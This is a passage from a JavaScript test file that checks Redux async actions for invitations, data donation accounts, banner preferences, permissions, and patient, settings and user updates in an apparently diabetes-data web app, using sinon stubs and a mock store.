  it('should trigger RESEND_INVITE_SUCCESS and it should call api.invitation.resend and callback once for a successful request', () => {
    let inviteId = 'inviteId';
    let invite = { foo: 'bar' };
    let api = {
      invitation: {
        resend: sinon.stub().callsArgWith(1, null, invite)
      }
    };
    let expectedActions = [
      { type: 'RESEND_INVITE_REQUEST' },
      { type: 'RESEND_INVITE_SUCCESS', payload: { invite: invite, removedInviteId: inviteId } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.resendInvite(api, inviteId));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.resend.calledWith(inviteId)).to.be.true;
  });

  it('should trigger RESEND_INVITE_FAILURE and it should call api.invitation.resend and callback once with error for a failed request', () => {
    let inviteId = 'inviteId';
    const error = {
      status: 500,
      body: 'Error!'
}; let api = { invitation: { resend: sinon.stub().callsArgWith(1, error) } }; let err = new Error(ErrorMessages.ERR_RESENDING_INVITE); err.status = 500; let expectedActions = [ { type: 'RESEND_INVITE_REQUEST' }, { type: 'RESEND_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.resendInvite(api, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_RESENDING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.resend.calledWith(inviteId)).to.be.true; }); }); describe('cancelSentInvite', () => { it('should trigger CANCEL_SENT_INVITE_SUCCESS and it should call api.invitation.cancel and callback once for a successful request', () => { let email = '<EMAIL>'; let api = { invitation: { cancel: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'CANCEL_SENT_INVITE_REQUEST' }, { type: 'CANCEL_SENT_INVITE_SUCCESS', payload: { removedEmail: email } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.cancelSentInvite(api, email, callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.cancel.calledWith(email)).to.be.true; // assert callback contains no error, and the email sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null, email); }); it('should trigger CANCEL_SENT_INVITE_FAILURE and it should call api.invitation.send and callback once with error for a failed request', () => { let email = '<EMAIL>'; const error = { status: 500, body: 'Error!' 
}; let api = { invitation: { cancel: sinon.stub().callsArgWith(1, error) } }; let err = new Error(ErrorMessages.ERR_CANCELLING_INVITE); err.status = 500; let expectedActions = [ { type: 'CANCEL_SENT_INVITE_REQUEST' }, { type: 'CANCEL_SENT_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.cancelSentInvite(api, email, callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CANCELLING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.cancel.calledWith(email)).to.be.true; // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error, email); }); }); describe('updateDataDonationAccounts', () => { it('should trigger UPDATE_DATA_DONATION_ACCOUNTS_SUCCESS and it should add and remove accounts for a successful request', () => { let addAccounts = [ TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL, ]; let removeAccounts = [ { email: '<EMAIL>' }, ]; let api = { invitation: { send: sinon.stub().callsArgWith(2, null, { email: TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL }), cancel: sinon.stub().callsArgWith(1, null, { removedEmail: '<EMAIL>' }), getSent: sinon.stub(), } }; let expectedActions = [ { type: 'UPDATE_DATA_DONATION_ACCOUNTS_REQUEST' }, { type: 'SEND_INVITE_REQUEST'}, { type: 'FETCH_PENDING_SENT_INVITES_REQUEST'}, { type: 'SEND_INVITE_SUCCESS', payload: { invite: { email: TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL } } }, { type: 'CANCEL_SENT_INVITE_REQUEST' }, { type: 'CANCEL_SENT_INVITE_SUCCESS', payload: { removedEmail: '<EMAIL>' } }, { type: 'UPDATE_DATA_DONATION_ACCOUNTS_SUCCESS', payload: { dataDonationAccounts: { addAccounts: _.map(addAccounts, email => ({ email: email })), removeAccounts: 
_.map(removeAccounts, account => account.email), }}} ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore(_.assign({}, initialState, { blip: { loggedInUserId: 1234 }, })); store.dispatch(async.updateDataDonationAccounts(api, addAccounts, removeAccounts)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); it('should trigger UPDATE_DATA_DONATION_ACCOUNTS_FAILURE and it should call error once for a failed add account request', () => { let addAccounts = [ TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL, ]; let removeAccounts = [ { email: '<EMAIL>' }, ]; let err = new Error(ErrorMessages.ERR_UPDATING_DATA_DONATION_ACCOUNTS); err.status = 500; let sendErr = new Error(ErrorMessages.ERR_SENDING_INVITE); sendErr.status = 500; let api = { invitation: { send: sinon.stub().callsArgWith(2, { status: 500, body: 'Error!' } , null), cancel: sinon.stub().callsArgWith(1, null, { removedEmail: '<EMAIL>' }), getSent: sinon.stub(), } }; let expectedActions = [ { type: 'UPDATE_DATA_DONATION_ACCOUNTS_REQUEST' }, { type: 'SEND_INVITE_REQUEST' }, { type: 'SEND_INVITE_FAILURE', error: sendErr, meta: { apiError: { status: 500, body: 'Error!' } } }, { type: 'CANCEL_SENT_INVITE_REQUEST' }, { type: 'CANCEL_SENT_INVITE_SUCCESS', payload: { removedEmail: '<EMAIL>' } }, { type: 'UPDATE_DATA_DONATION_ACCOUNTS_FAILURE', error: err, meta: { apiError: { status: 500, body: 'Error!' 
// NOTE(review): continues the updateDataDonationAccounts failure test (closing its expected
// UPDATE_DATA_DONATION_ACCOUNTS_FAILURE action), then covers the banner preference describes:
// dismissDonateBanner, dismissDexcomConnectBanner, clickDexcomConnectBanner,
// dismissShareDataBanner, clickShareDataBanner — each dispatches DISMISS_BANNER followed by the
// updatePreferences request/success pair — and opens describe('acceptReceivedInvite').
} } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore(_.assign({}, initialState, { blip: { loggedInUserId: 1234 }, })); store.dispatch(async.updateDataDonationAccounts(api, addAccounts, removeAccounts)); const actions = store.getActions(); expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_INVITE }); expectedActions[2].error = actions[2].error; expect(actions[5].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_DATA_DONATION_ACCOUNTS }); expectedActions[5].error = actions[5].error; expect(actions).to.eql(expectedActions); }); }); describe('dismissDonateBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { dismissedDonateYourDataBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'donate' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { dismissedDonateYourDataBannerTime: preferences.dismissedDonateYourDataBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissDonateBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('dismissDexcomConnectBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { dismissedDexcomConnectBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2,
null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'dexcom' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { dismissedDexcomConnectBannerTime: preferences.dismissedDexcomConnectBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissDexcomConnectBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('clickDexcomConnectBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { clickedDexcomConnectBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'dexcom' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { clickedDexcomConnectBannerTime: preferences.clickedDexcomConnectBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.clickDexcomConnectBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('dismissShareDataBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { dismissedShareDataBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put:
sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'sharedata' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { dismissedShareDataBannerTime: preferences.dismissedShareDataBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissShareDataBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('clickShareDataBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { clickedShareDataBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'sharedata' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { clickedShareDataBannerTime: preferences.clickedShareDataBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.clickShareDataBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('acceptReceivedInvite', () => { it('should trigger ACCEPT_RECEIVED_INVITE_SUCCESS and it should call acceptReceivedInvite once for a successful request', () => { let invitation = { key: 'foo', creator: { userid: 500 } }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { invitation: { accept:
// NOTE(review): covers acceptReceivedInvite (success fetches the inviting patient afterwards;
// failure expects ERR_ACCEPTING_INVITE), rejectReceivedInvite (dismiss path), and most of
// setMemberPermissions. The three source rows are kept on one physical line because the raw
// chunk boundaries here fall inside the it(...) description string literals.
sinon.stub().callsArgWith(2, null, invitation) }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'ACCEPT_RECEIVED_INVITE_REQUEST', payload: { acceptedReceivedInvite: invitation } }, { type: 'ACCEPT_RECEIVED_INVITE_SUCCESS', payload: { acceptedReceivedInvite: invitation } }, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient : patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptReceivedInvite(api, invitation)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.accept.calledWith(invitation.key, invitation.creator.userid)).to.be.true; expect(api.patient.get.calledWith(invitation.creator.userid)).to.be.true; }); it('should trigger ACCEPT_RECEIVED_INVITE_FAILURE and it should call acceptReceivedInvite once for a failed request', () => { let invitation = { key: 'foo', creator: { id: 500 } }; let api = { invitation: { accept: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_ACCEPTING_INVITE); err.status = 500; let expectedActions = [ { type: 'ACCEPT_RECEIVED_INVITE_REQUEST', payload: { acceptedReceivedInvite: invitation } }, { type: 'ACCEPT_RECEIVED_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptReceivedInvite(api, invitation)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCEPTING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.accept.calledWith(invitation.key, invitation.creator.userid)).to.be.true; }); }); describe('rejectReceivedInvite', () => { it('should trigger REJECT_RECEIVED_INVITE_SUCCESS and it should call rejectReceivedInvite once for a successful request', () => { let invitation = { key: 'foo', creator: { userid: 500 } }; let api = { invitation: { dismiss: sinon.stub().callsArgWith(2, null, invitation) } }; let expectedActions = [ { type: 'REJECT_RECEIVED_INVITE_REQUEST', payload: { rejectedReceivedInvite: invitation } }, { type: 'REJECT_RECEIVED_INVITE_SUCCESS', payload: { rejectedReceivedInvite: invitation } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.rejectReceivedInvite(api, invitation)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.dismiss.calledWith(invitation.key, invitation.creator.userid)).to.be.true; }); it('should trigger REJECT_RECEIVED_INVITE_FAILURE and it should call rejectReceivedInvite once for a failed request', () => { let invitation = { key: 'foo', creator: { id: 500 } }; let api = { invitation: { dismiss: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_REJECTING_INVITE); err.status = 500; let expectedActions = [ { type: 'REJECT_RECEIVED_INVITE_REQUEST', payload: { rejectedReceivedInvite: invitation } }, { type: 'REJECT_RECEIVED_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.rejectReceivedInvite(api, invitation)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_REJECTING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.dismiss.calledWith(invitation.key, invitation.creator.userid)).to.be.true; }); }); describe('setMemberPermissions', () => { it('should trigger SET_MEMBER_PERMISSIONS_SUCCESS and it should call setMemberPermissions once for a successful request', () => { let patientId = 50; let patient = { id: 50, name: '<NAME>' }; let memberId = 2; let permissions = { read: false }; let api = { access: { setMemberPermissions: sinon.stub().callsArgWith(2, null) }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'SET_MEMBER_PERMISSIONS_REQUEST' }, { type: 'SET_MEMBER_PERMISSIONS_SUCCESS', payload: { memberId: memberId, permissions: permissions } }, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient: patient } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.setMemberPermissions(api, patientId, memberId, permissions)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.access.setMemberPermissions.calledWith(memberId, permissions)).to.be.true; expect(api.patient.get.calledWith(patientId)).to.be.true; }); it('should trigger SET_MEMBER_PERMISSIONS_FAILURE and it should call setMemberPermissions once for a failed request', () => { let patientId = 50; let memberId = 2; let permissions = { read: false }; let api = { access: { setMemberPermissions: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_CHANGING_PERMS); err.status = 500; let expectedActions = [ { type: 'SET_MEMBER_PERMISSIONS_REQUEST' }, { type: 'SET_MEMBER_PERMISSIONS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.setMemberPermissions(api, patientId, memberId, permissions)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CHANGING_PERMS }); expectedActions[1].error =
// NOTE(review): closes the setMemberPermissions failure assertions, then covers
// describe('updatePatient') (success tracks the 'Updated Profile' metric),
// describe('updatePreferences'), and the start of describe('updateSettings') — including the
// bg-units variant that additionally dispatches the UPDATE_PATIENT_BG_UNITS request/success pair.
actions[1].error; expect(actions).to.eql(expectedActions); expect(api.access.setMemberPermissions.calledWith(memberId, permissions)).to.be.true; }); }); describe('updatePatient', () => { it('should trigger UPDATE_PATIENT_SUCCESS and it should call updatePatient once for a successful request', () => { let patient = { name: 'Bruce' }; let api = { patient: { put: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'UPDATE_PATIENT_REQUEST' }, { type: 'UPDATE_PATIENT_SUCCESS', payload: { updatedPatient: patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePatient(api, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.patient.put.calledWith(patient)).to.be.true; expect(trackMetric.calledWith('Updated Profile')).to.be.true; }); it('should trigger UPDATE_PATIENT_FAILURE and it should call updatePatient once for a failed request', () => { let patient = { name: 'Bruce' }; let api = { patient: { put: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_UPDATING_PATIENT); err.status = 500; let expectedActions = [ { type: 'UPDATE_PATIENT_REQUEST' }, { type: 'UPDATE_PATIENT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePatient(api, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_PATIENT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patient.put.calledWith(patient)).to.be.true; }); }); describe('updatePreferences', () => { it('should trigger UPDATE_PREFERENCES_SUCCESS and it should call updatePreferences once for a successful request',
() => { let patientId = 1234; let preferences = { display: 'all' }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences) } } }; let expectedActions = [ { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: preferences } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePreferences(api, patientId, preferences)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.metadata.preferences.put.calledWith(patientId, preferences)).to.be.true; }); it('should trigger UPDATE_PREFERENCES_FAILURE and it should call updatePreferences once for a failed request', () => { let patientId = 1234; let preferences = { display: 'all' }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } } }; let err = new Error(ErrorMessages.ERR_UPDATING_PREFERENCES); err.status = 500; let expectedActions = [ { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePreferences(api, patientId, preferences)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_PREFERENCES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.metadata.preferences.put.calledWith(patientId, preferences)).to.be.true; }); }); describe('updateSettings', () => { it('should trigger UPDATE_SETTINGS_SUCCESS and it should call updateSettings once for a successful request', () => { let patientId = 1234; let settings = { siteChangeSource: 'cannulaPrime' }; let api = { metadata: { settings: { put:
sinon.stub().callsArgWith(2, null, settings) } } }; let expectedActions = [ { type: 'UPDATE_SETTINGS_REQUEST' }, { type: 'UPDATE_SETTINGS_SUCCESS', payload: { userId: patientId, updatedSettings: settings } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateSettings(api, patientId, settings)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.metadata.settings.put.calledWith(patientId, settings)).to.be.true; }); it('should trigger UPDATE_PATIENT_BG_UNITS_REQUEST when bg units are being updated', () => { let patientId = 1234; let settings = { units: { bg: MMOLL_UNITS} }; let api = { metadata: { settings: { put: sinon.stub().callsArgWith(2, null, settings) } } }; let expectedActions = [ { type: 'UPDATE_SETTINGS_REQUEST' }, { type: 'UPDATE_PATIENT_BG_UNITS_REQUEST' }, { type: 'UPDATE_SETTINGS_SUCCESS', payload: { userId: patientId, updatedSettings: settings } }, { type: 'UPDATE_PATIENT_BG_UNITS_SUCCESS', payload: { userId: patientId, updatedSettings: settings } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateSettings(api, patientId, settings)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.metadata.settings.put.calledWith(patientId, settings)).to.be.true; }); it('should trigger UPDATE_SETTINGS_FAILURE and it should call updateSettings once for a failed request', () => { let patientId = 1234; let settings = { siteChangeSource: 'cannulaPrime' }; let api = { metadata: { settings: { put: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } } }; let err = new Error(ErrorMessages.ERR_UPDATING_SETTINGS); err.status = 500; let expectedActions = [ { type: 'UPDATE_SETTINGS_REQUEST' }, { type: 'UPDATE_SETTINGS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
// NOTE(review): finishes the updateSettings failure tests (including the combined
// UPDATE_SETTINGS_FAILURE + UPDATE_PATIENT_BG_UNITS_FAILURE case), then covers
// describe('updateUser') and describe('updateClinicianProfile') — the latter additionally
// asserts the router push to '/patients?justLoggedIn=true', or to '/workspaces' when the
// rewired config has CLINICS_ENABLED and pendingReceivedClinicianInvites is non-empty.
// The first two source rows share one physical line: the raw chunk boundary splits an it(...) string.
]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateSettings(api, patientId, settings)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_SETTINGS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.metadata.settings.put.calledWith(patientId, settings)).to.be.true; }); it('should trigger UPDATE_PATIENT_BG_UNITS_FAILURE and it should call updateSettings once for a failed request', () => { let patientId = 1234; let settings = { units: { bg: MMOLL_UNITS} }; let api = { metadata: { settings: { put: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } } }; let err = new Error(ErrorMessages.ERR_UPDATING_SETTINGS); err.status = 500; let bgErr = new Error(ErrorMessages.ERR_UPDATING_PATIENT_BG_UNITS); bgErr.status = 500; let expectedActions = [ { type: 'UPDATE_SETTINGS_REQUEST' }, { type: 'UPDATE_PATIENT_BG_UNITS_REQUEST' }, { type: 'UPDATE_SETTINGS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }, { type: 'UPDATE_PATIENT_BG_UNITS_FAILURE', error: bgErr, meta: { apiError: {status: 500, body: 'Error!'} } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateSettings(api, patientId, settings)); const actions = store.getActions(); expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_SETTINGS }); expectedActions[2].error = actions[2].error; expect(actions[3].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_PATIENT_BG_UNITS }); expectedActions[3].error = actions[3].error; expect(actions).to.eql(expectedActions); expect(api.metadata.settings.put.calledWith(patientId, settings)).to.be.true; }); }); describe('updateUser', () => { it('should trigger UPDATE_USER_SUCCESS and it should call updateUser once for a successful request', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 }, }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, preferences: {}, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, preferences: {}, password: '<PASSWORD>' }; let updatedUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe', password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, null, updatedUser) } }; let initialStateForTest = _.merge({}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId }); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_SUCCESS', payload: { userId: loggedInUserId, updatedUser: updatedUser } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateUser(api, formValues)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; expect(trackMetric.calledWith('Updated Account')).to.be.true; }); it('should trigger UPDATE_USER_FAILURE and it should call updateUser once for a failed request', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 } }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, preferences: {}, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, preferences: {}, password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1,
{status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_UPDATING_USER); err.status = 500; let initialStateForTest = _.merge({}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId }); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateUser(api, formValues)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_USER }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; }); }); describe('updateClinicianProfile', () => { it('should trigger UPDATE_USER_SUCCESS and it should call updateClinicianProfile once for a successful request and route user to patients view', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 }, }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, password: '<PASSWORD>' }; let updatedUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe', password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, null, updatedUser) } }; let initialStateForTest = _.merge({}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId }); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type:
